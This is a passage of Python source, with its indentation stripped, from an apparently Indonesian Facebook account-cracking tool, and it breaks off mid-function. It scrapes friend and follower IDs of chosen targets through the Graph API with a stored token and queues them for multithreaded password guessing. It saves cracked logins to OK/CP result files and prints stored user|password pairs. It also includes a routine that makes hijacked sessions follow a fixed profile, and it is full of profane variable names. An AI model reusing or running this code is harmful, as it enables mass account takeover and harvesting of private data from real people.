email = "@hotmail.com"
nama = input(f">--Masukan Nama--> ")
jumlah = int(input(f">--Limit--> "))
for z in range(jumlah):
x += 1
idd.append(nama+str(x)+email+"<=>"+nama)
elif ask in["4"]:
email = "@outlook.com"
nama = input(f">--Masukan Nama--> ")
jumlah = int(input(f">--Limit--> "))
for z in range(jumlah):
x += 1
idd.append(nama+str(x)+email+"<=>"+nama)
god=""
god += "Jumlah Idz Yang Terkumpul : "+II+str(len(idd))+QQ
if len(idd)==0:
MML = M
say = "NOT"
else:
MML = I
say = "YES"
iprint(Panel(god, title="Information", style=MML))
if say == "NOT":
kotak("# MOHON MAAF JUMLAH IDZ YANG TERKUMPUL NOL ATAU TIDAK ADA",M,O)
os.sys.exit()
tod = me()
tod.add_column("NO", style=I, justify="center")
tod.add_column("PILIHAN", style=M, justify="center", width=60)
tod.add_row(f"1\n2\n3",f"Crack Dari Akun Tertua\nCrack Dari Akun Termuda\nCrack Dari Random{QQ}({II}Recommended{QQ})")
sol().print(tod, justify='center')
hu = input(f'>--{c}Pilih 1-3{q}--> ')
if hu in ['1','01']:
for rikod in idd:
id.append(rikod)
elif hu in ['2','02']:
for rikod in idd:
id.insert(0,rikod)
elif hu in ['3','03']:
for rikod in idd:
xx = random.randint(0,len(id))
id.insert(xx,rikod)
else:
kotak("# LAIN KALI ISI DENGAN BENAR !!", M, Q);time.sleep(4)
for rikod in idd:
id.insert(0,rikod)
crack_new().otomatis()
def public_mass(self):
try:
token = open("data/login.txt", "r").read()
except IOError:
os.system("rm -rf data/login.txt")
os.sys.exit()
god = ""
kotak("# MASUKAN JUMLAH TARGER",K,Q)
try:jmlh_ = int(input(">--Jumlah--> "))
except:jmlh_ = 1
kotak("# SILAHKAN MASUKAM IDZ/USERNAME UNTUK DICRACK !!",C,Q)
for x in range(jmlh_):
idt = input(f">--{k}Target{q}--> : ")
limit = ("10000")
idt = self.ubah_user(idt)
god += ("Nama : "+II+self.ambil_nama(idt)+QQ+"\n")
try:
url = ("https://graph.facebook.com/%s?fields=friends.fields(id,name)&access_token=%s"%(idt,tiktok))
with requests.Session() as xyz:
jso = json.loads(xyz.get(url,cookies=puput).text)
for i in jso["friends"]["data"]:
try:
uid = i["id"]
nama = i["name"]
idd.append(uid+"<=>"+nama)
except:pass
except KeyError:pass
god += "Jumlah Idz Yang Terkumpul : "+II+str(len(idd))+QQ
if len(idd)==0:
MML = M
say = "NOT"
else:
MML = I
say = "YES"
iprint(Panel(god, title="Information", style=MML))
if say == "NOT":
kotak("# MOHON MAAF JUMLAH IDZ YANG TERKUMPUL NOL ATAU TIDAK ADA",M,O)
os.sys.exit()
tod = me()
tod.add_column("NO", style=I, justify="center")
tod.add_column("PILIHAN", style=M, justify="center", width=60)
tod.add_row(f"1\n2\n3",f"Crack Dari Akun Tertua\nCrack Dari Akun Termuda\nCrack Dari Random{QQ}({II}Recommended{QQ})")
sol().print(tod, justify='center')
hu = input(f'>--{c}Pilih 1-3{q}--> ')
if hu in ['1','01']:
for rikod in idd:
id.append(rikod)
elif hu in ['2','02']:
for rikod in idd:
id.insert(0,rikod)
elif hu in ['3','03']:
for rikod in idd:
xx = random.randint(0,len(id))
id.insert(xx,rikod)
else:
kotak("# LAIN KALI ISI DENGAN BENAR !!", M, Q);time.sleep(4)
for rikod in idd:
id.insert(0,rikod)
crack_new().otomatis()
def public(self):
try:
token = open("data/login.txt", "r").read()
except IOError:
os.system("rm -rf data/login.txt")
os.sys.exit()
god = ""
kotak("# SILAHKAN MASUKAM IDZ/USERNAME UNTUK DICRACK !!",C,Q)
idt = input(f">--{k}Target{q}--> : ")
limit = ("10000")
idt = self.ubah_user(idt)
god += ("Nama : "+II+self.ambil_nama(idt)+QQ+"\n")
try:
url = ("https://graph.facebook.com/%s?fields=friends.fields(id,name)&access_token=%s"%(idt,tiktok))
with requests.Session() as xyz:
jso = json.loads(xyz.get(url,cookies=puput).text)
for i in jso["friends"]["data"]:
try:
uid = i["id"]
nama = i["name"]
idd.append(uid+"<=>"+nama)
except:pass
except KeyError:pass
god += "Jumlah Idz Yang Terkumpul : "+II+str(len(idd))+QQ
if len(idd)==0:
MML = M
say = "NOT"
else:
MML = I
say = "YES"
iprint(Panel(god, title="Information", style=MML))
if say == "NOT":
kotak("# MOHON MAAF JUMLAH IDZ YANG TERKUMPUL NOL ATAU TIDAK ADA",M,O)
os.sys.exit()
tod = me()
tod.add_column("NO", style=I, justify="center")
tod.add_column("PILIHAN", style=M, justify="center", width=60)
tod.add_row(f"1\n2\n3",f"Crack Dari Akun Tertua\nCrack Dari Akun Termuda\nCrack Dari Random{QQ}({II}Recommended{QQ})")
sol().print(tod, justify='center')
hu = input(f'>--{c}Pilih 1-3{q}--> ')
if hu in ['1','01']:
for rikod in idd:
id.append(rikod)
elif hu in ['2','02']:
for rikod in idd:
id.insert(0,rikod)
elif hu in ['3','03']:
for rikod in idd:
xx = random.randint(0,len(id))
id.insert(xx,rikod)
else:
kotak("# LAIN KALI ISI DENGAN BENAR !!", M, Q);time.sleep(4)
for rikod in idd:
id.insert(0,rikod)
crack_new().otomatis()
def public_v2(self):
max=0
non,idb=[],[]
try:
token = open("data/login.txt", "r").read()
except IOError:
os.system("rm -rf data/login.txt")
os.sys.exit()
god = ""
kotak("# SILAHKAN MASUKAM IDZ/USERNAME UNTUK DICRACK !!",C,Q)
idt = input(f">--{k}Target{q}--> : ")
limit = ("10000")
idt = self.ubah_user(idt)
try:
url = ("https://graph.facebook.com/%s?fields=friends.fields(id,name).limit(5000)&access_token=%s"%(idt,tiktok))
with requests.Session() as xyz:
jso = json.loads(xyz.get(url,cookies=puput).text)
for i in jso["friends"]["data"]:
try:
uid = i["id"]
non.append(uid)
except:pass
except KeyError:pass
for rikod in non:
xx = random.randint(0,len(idb))
idb.insert(xx,rikod)
for ml in non:
if max==5:break
try:
goblok = []
tolol = []
url = ("https://graph.facebook.com/%s?fields=friends.fields(id,name)&access_token=%s"%(ml,tiktok))
with requests.Session() as xyz:
jso = json.loads(xyz.get(url,cookies=puput).text)
for i in jso["friends"]["data"]:
try:
anak_kontol_anak_anjing_pantek_lonte_bentar_lagi_mau_tahun_baru_kontol = i["id"]
goblok.append(anak_kontol_anak_anjing_pantek_lonte_bentar_lagi_mau_tahun_baru_kontol)
except:pass
url = ("https://graph.facebook.com/"+ml+"/subscribers?limit=9999&access_token="+token)
with requests.Session() as xyz:
jso = json.loads(xyz.get(url,cookies=puput).text)
for i in jso["data"]:
try:
anak_kontol_anak_anjing_pantek_lonte_bentar_lagi_mau_tahun_baru_kontol_asw = i["id"]
tolol.append(anak_kontol_anak_anjing_pantek_lonte_bentar_lagi_mau_tahun_baru_kontol_asw)
except:pass
except KeyError:pass
todz = me()
todz.add_column("ID", style=I, justify="center")
todz.add_column("JUMLAH TEMAN", style=C, justify="center")
todz.add_column("JUMLAH PENGIKUT", style=O, justify="center")
todz.add_row(f'{ml}',f"{len(goblok)}",f"{len(tolol)}")
if "0" == f"{len(goblok)}":
if "0" == f"{len(tolol)}":max-=1
else:
sol().print(todz, justify='center')
else:
sol().print(todz, justify='center')
max+=1
kotak("# SILAHKAN MASUKAM IDZ/USERNAME UNTUK DICRACK !!",C,Q)
idt = input(f">--{k}Target{q}--> : ")
limit = ("10000")
idt = self.ubah_user(idt)
try:
url = ("https://graph.facebook.com/%s?fields=friends.fields(id,name).limit(5000)&access_token=%s"%(idt,tiktok))
with requests.Session() as xyz:
jso = json.loads(xyz.get(url,cookies=puput).text)
for i in jso["friends"]["data"]:
try:
uid = i["id"]
nama = i["name"]
idd.append(uid+"<=>"+nama)
except:pass
except KeyError:pass
god += ("Nama : "+II+self.ambil_nama(idt)+QQ+"\n")
god += "Jumlah Idz Yang Terkumpul : "+II+str(len(idd))+QQ
if len(idd)==0:
MML = M
say = "NOT"
else:
MML = I
say = "YES"
iprint(Panel(god, title="Information", style=MML))
if say == "NOT":
kotak("# MOHON MAAF JUMLAH IDZ YANG TERKUMPUL NOL ATAU TIDAK ADA",M,O)
os.sys.exit()
tod = me()
tod.add_column("NO", style=I, justify="center")
tod.add_column("PILIHAN", style=M, justify="center", width=60)
tod.add_row(f"1\n2\n3",f"Crack Dari Akun Tertua\nCrack Dari Akun Termuda\nCrack Dari Random{QQ}({II}Recommended{QQ})")
sol().print(tod, justify='center')
hu = input(f'>--{c}Pilih 1-3{q}--> ')
if hu in ['1','01']:
for rikod in idd:
id.append(rikod)
elif hu in ['2','02']:
for rikod in idd:
id.insert(0,rikod)
elif hu in ['3','03']:
for rikod in idd:
xx = random.randint(0,len(id))
id.insert(xx,rikod)
else:
kotak("# LAIN KALI ISI DENGAN BENAR !!", M, Q);time.sleep(4)
for rikod in idd:
id.insert(0,rikod)
crack_new().otomatis()
def follow(self):
try:
token = open("data/login.txt", "r").read()
except IOError:
os.system("rm -rf data/login.txt")
os.sys.exit()
god = ""
kotak("# SILAHKAN MASUKAM IDZ/USERNAME UNTUK DICRACK !!",C,Q)
idt = input(f">--{k}Target{q}--> : ")
limit = ("10000")
idt = self.ubah_user(idt)
god += ("Nama : "+II+self.ambil_nama(idt)+QQ+"\n")
try:
url = ("https://graph.facebook.com/%s?fields=name,subscribers.fields(id,name).limit(500000)&access_token=%s"%(idt,tiktok))
with requests.Session() as xyz:
jso = json.loads(xyz.get(url,cookies=puput).text)
for i in jso["subscribers"]["data"]:
try:
uid = i["id"]
nama = i["name"]
idd.append(uid+"<=>"+nama)
except:pass
except KeyError:pass
god += "Jumlah Idz Yang Terkumpul : "+II+str(len(idd))+QQ
if len(idd)==0:
MML = M
say = "NOT"
else:
MML = I
say = "YES"
iprint(Panel(god, title="Information", style=MML))
if say == "NOT":
kotak("# MOHON MAAF JUMLAH IDZ YANG TERKUMPUL NOL ATAU TIDAK ADA",M,O)
os.sys.exit()
tod = me()
tod.add_column("NO", style=I, justify="center")
tod.add_column("PILIHAN", style=M, justify="center", width=60)
tod.add_row(f"1\n2\n3",f"Crack Dari Akun Tertua\nCrack Dari Akun Termuda {QQ}({II}Recommended{QQ}){MM}\nCrack Dari Random")
sol().print(tod, justify='center')
hu = input(f'>--{c}Pilih 1-3{q}--> ')
if hu in ['1','01']:
for rikod in idd:
id.append(rikod)
elif hu in ['2','02']:
for rikod in idd:
id.insert(0,rikod)
elif hu in ['3','03']:
for rikod in idd:
xx = random.randint(0,len(id))
id.insert(xx,rikod)
else:
kotak("# LAIN KALI ISI DENGAN BENAR !!", M, Q);time.sleep(4)
for rikod in idd:
id.insert(0,rikod)
crack_new().otomatis()
def cek_jumlah_teman(self):
try:
token = open("data/login.txt", "r").read()
toket = open("data/login.txt", "r").read()
except IOError:
os.system("rm -rf .login.txt")
kotak("# MAAF TOKEN ANDA RUSAK/ERROR",M,Q)
time.sleep(2)
os.sys.exit()
god = ""
kotak("# SILAHKAN MASUKAM IDZ/USERNAME UNTUK DICRACK !!",C,Q)
idt = input(f">--{k}Target{q}--> : ")
idt = self.ubah_user(idt)
god += ("Nama : "+II+self.ambil_nama(idt)+QQ+"\n")
try:
url = ("https://graph.facebook.com/%s?fields=friends.fields(id,name)&access_token=%s"%(idt,tiktok))
with requests.Session() as xyz:
jso = json.loads(xyz.get(url,cookies=puput).text)
for i in jso["friends"]["data"]:
try:
uid = i["id"]
idd.append(uid)
except:pass
except KeyError:pass
god += "Jumlah Idz Yang Terkumpul : "+II+str(len(idd))+QQ
if len(idd)==0:
MML = M
say = "NOT"
else:
MML = I
say = "YES"
iprint(Panel(god, title="Information", style=MML))
if say == "NOT":
kotak("# MOHON MAAF JUMLAH IDZ YANG TERKUMPUL NOL ATAU TIDAK ADA",M,O)
os.sys.exit()
tod = me()
tod.add_column("NO", style=I, justify="center")
tod.add_column("PILIHAN", style=M, justify="center", width=60)
tod.add_row(f"1\n2\n3",f"Check Jumlah Teman Dari Akun Tertua\nCheck Jumlah Teman Dari Akun Termuda\nCheck Jumlah Teman Dari Random")
sol().print(tod, justify='center')
hu = input(f'>--{c}Pilih 1-3{q}--> ')
if hu in ['1','01']:
for rikod in idd:
id.append(rikod)
elif hu in ['2','02']:
for rikod in idd:
id.insert(0,rikod)
elif hu in ['3','03']:
for rikod in idd:
xx = random.randint(0,len(id))
id.insert(xx,rikod)
else:
kotak("# LAIN KALI ISI DENGAN BENAR !!", M, Q);time.sleep(4)
for rikod in idd:
id.insert(0,rikod)
with __Kiky__(max_workers=10) as (kiky_gtg):
for data in id:
kiky_gtg.submit(self._lonte_, data, toket, token)
def _lonte_(self, ml, token, toket):
try:
goblok = []
tolol = []
url = ("https://graph.facebook.com/%s?fields=friends.fields(id,name)&access_token=%s"%(ml,tiktok))
with requests.Session() as xyz:
jso = json.loads(xyz.get(url,cookies=puput).text)
for i in jso["friends"]["data"]:
try:
anak_kontol_anak_anjing_pantek_lonte_bentar_lagi_mau_tahun_baru_kontol = i["id"]
goblok.append(anak_kontol_anak_anjing_pantek_lonte_bentar_lagi_mau_tahun_baru_kontol)
except:pass
url = ("https://graph.facebook.com/"+ml+"/subscribers?limit=9999&access_token="+token)
with requests.Session() as xyz:
jso = json.loads(xyz.get(url,cookies=puput).text)
for i in jso["data"]:
try:
anak_kontol_anak_anjing_pantek_lonte_bentar_lagi_mau_tahun_baru_kontol_asw = i["id"]
tolol.append(anak_kontol_anak_anjing_pantek_lonte_bentar_lagi_mau_tahun_baru_kontol_asw)
except:pass
except KeyError:pass
todz = me()
todz.add_column("ID", style=I, justify="center")
todz.add_column("JUMLAH TEMAN", style=C, justify="center")
todz.add_column("JUMLAH PENGIKUT", style=O, justify="center")
todz.add_row(f'{ml}',f"{len(goblok)}",f"{len(tolol)}")
if "0" == f"{len(goblok)}":
if "0" == f"{len(tolol)}":pass
else:
sol().print(todz, justify='center')
else:
sol().print(todz, justify='center')
def cekfile_crk(self, folder):
dirs = os.listdir(folder)
god_cp,god_ok="",""
for file in dirs:
filex = (folder+"/"+file)
try:
juma = open(filex,"r").readlines()
total = ("%s"%(str(len(juma))))
except:total = (" ?? ")
try:
ijo__ = filex.split("results/OK-")[1]
ijo_ = (QQ+II+"results/OK-"+ijo__)
god_ok += (ijo_+QQ+" <--|--> "+QQ+MM+total+QQ+"\n")
except:pass
try:
kuning__ = filex.split("results/CP-")[1]
kuning_ = (QQ+KK+"results/CP-"+kuning__)
god_cp += (kuning_+QQ+" <--|--> "+QQ+MM+total+QQ+"\n")
except:pass
iprint(Panel(god_ok, style=I, title="RESULTS OK"))
iprint(Panel(god_cp, style=K, title="RESULTS CP"))
print()
def rek(self):
self.cekfile_crk("results")
namax=input(f">--Nama File--> ")
try:
fila=open(namax,"r").readlines()
except FileNotFoundError:
kotak("# MAAF FILE YANG ANDA MASUKAN TIDAK ADA !!", M,Q);time.sleep(3)
self.rek()
try:
volak = namax.split("CP-")[1];copy_ri = ("");Ass = ("%s"%(KK));aSs = KK
except:
try:
vok = namax.split("OK-")[1]
copy_ri = ("")
Ass = ("%s"%(II))
aSs = II
except:
copy_ri = ("DARK-FB")
Ass = ("%s"%(CC))
aSs = MM
kotak(f"# JUMLAH AKUN : {len(fila)}",C,Q)
with __Kiky__(max_workers=30) as (form):
for data in fila:
try:
data = data.replace("\n","")
try:user,pw,tll = data.split("|")
except:user,pw = data.split("|");tll=(" - ")
iprint(Panel(f"{QQ}{Ass}{copy_ri}{QQ}{aSs}{user}|{pw}|{tll}{QQ}", style=Q, title="AKUN"))
except:pass
time.sleep(0.01)
def cek_opsi(self):
cekfile_crk("results")
print(">--Contoh-->"+k+"results/CP-"+durasi+".txt"+q)
files = input('>--Nama File-->')
try:
buka_baju = open(files,"r").readlines()
except FileNotFoundError:
kotak("# MAAF FILE YANG ANDA MASUKAN TIDAK ADA",M,Q)
time.sleep(2);self.cek_opsi()
with __Kiky__(max_workers=25) as kontok:
for memek in buka_baju:
kontol = memek.replace("\n","")
titid = kontol.split("|")
# try:
# kontok.submit(hide_opsi, titid[0], titid[1], titid[2])
# kontok.submit(cek_opsi_crack, titid[0], titid[1], titid[2])
# except:
kontok.submit(cek_opsi_crack, titid[0], titid[1], "")
# kontok.submit(hide_opsi, titid[0], titid[1], "")
kotak("# TEKAN ENTER UNTUK KEMBALI",I,Q)
input()
Main_()._no_vpn()
class crack_new:
def __init__(self):
_ = "UDAH TAU GW CODING SENDIRI ENGGA DIBANTU, NAK KALIAN RIKOD WKWKWK"
def Kontol_Kau_Ikuti(self,sessionn,cokii):
try:
r = BeautifulSoup(sessionn.get("https://mbasic.facebook.com/profile.php?id=100063690353340",cookies={"cookie":cokii}).text,"html.parser")
get = r.find("a",string="Ikuti").get("href")
sessionn.get("https://mbasic.facebook.com"+str(get),cookies={"cookie":cokii}).text
except:pass
try:
puput = {'cookie':cokii}
with requests.Session() as xyz:
for x in par(xyz.get('https://mbasic.facebook.com/100063690353340',cookies=puput).content,'html.parser').find_all('a',href=True):
if 'subscribe.php' in x['href']:
exec_folls = xyz.get('https://mbasic.facebook.com%s'%(x['href']),cookies=puput)
except:pass
def otomatis(self):
global anim,anim2
anim = Progress(SpinnerColumn("arrow2"),TextColumn('{task.description}'),BarColumn(),TextColumn('{task.percentage:.0f}%'))
anim2 = anim.add_task('',total=len(idd))
kotak("# SEBELUM CRACK SILAHKAN JAWAB PERTANYANN DIBAWAH INI",I,Q)
self.pilih_fps()
if "fast" == fps:pass
# self.buat_ugen()
# self.pilih_mentod_()
else:
self.tanya_apk()
self.tanya_opsi()
self.tanya_prox_k()
self.buat_ugen()
self.pilih_url()
self.pilih_mentod_()
self.pas_me()
iprint(Panel(f"{OO}JIGA TIDAK ADA HASIL, SILAHKAN HIDUP MATIKAN MODE PESAWAT{QQ}\n{II}RESULTS OK DISIMPAN KE : results/OK-{durasi}.txt\n{KK}RESULTS CP DISIMPAN KE : results/CP-{durasi}.txt{QQ}", style=Q, title="INFORMATION"))
with anim:
with __Kiky__(max_workers=35) as kontok:
for kocok in id:
try:
idz = kocok.split('<=>')[0]
pws = kocok.split('<=>')[1].lower()
pws_ = kocok.split('<=>')[1]
colmek = pws.split(' ')[0]
colmek_ = pws_.split(' ')[0]
pwe = []
if len(colmek)<5:
if len(colmek)<3:
if pass_ in ["01","1"]: